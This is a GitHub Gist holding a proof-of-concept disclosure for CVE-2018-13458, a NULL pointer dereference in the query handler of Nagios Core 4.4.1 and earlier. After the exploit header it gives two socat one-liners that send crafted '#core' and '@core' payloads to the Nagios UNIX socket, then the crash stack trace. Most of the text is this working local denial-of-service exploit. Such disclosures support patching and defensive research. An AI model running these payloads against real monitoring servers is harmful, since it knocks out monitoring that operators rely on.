Last active
July 11, 2018 15:21
-
-
Save fakhrizulkifli/40f3daf52950cca6de28ebec2498ff6e to your computer and use it in GitHub Desktop.
CVE-2018-13458
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Nagios Core qh_core Denial of Service | |
| # Date: 2018-07-09 | |
| # Exploit Author: Fakhri Zulkifli (@d0lph1n98) | |
| # Vendor Homepage: https://www.nagios.org/ | |
| # Software Link: https://www.nagios.org/downloads/nagios-core/ | |
| # Version: 4.4.1 and earlier | |
| # Tested on: 4.4.1 | |
| # CVE : CVE-2018-13458 | |
| qh_core in Nagios Core 4.4.1 and earlier is prone to a NULL pointer dereference vulnerability, which allows attackers to cause a local denial-of-service condition by sending a crafted payload to the listening UNIX socket. | |
| $ echo -ne “#core\0" | socat unix-connect:./poc/nagios.qh - | |
| $ echo -ne “@core\0" | socat unix-connect:./poc/nagios.qh - | |
| #0 0x5546bc in qh_core /home/user/nagioscore/base/query-handler.c:408:6 | |
| #1 0x5543db in qh_input /home/user/nagioscore/base/query-handler.c:227:12 | |
| #2 0x6fac51 in iobroker_poll /home/user/nagioscore/lib/iobroker.c:353:4 | |
| #3 0x5bc334 in event_execution_loop /home/user/nagioscore/base/events.c:1136:12 | |
| #4 0x53a503 in main /home/user/nagioscore/base/nagios.c:844:4 | |
| #5 0x7f6887b9882f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291 | |
| #6 0x42b278 in _start (/home/user/nagioscore/base/nagios+0x42b278) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment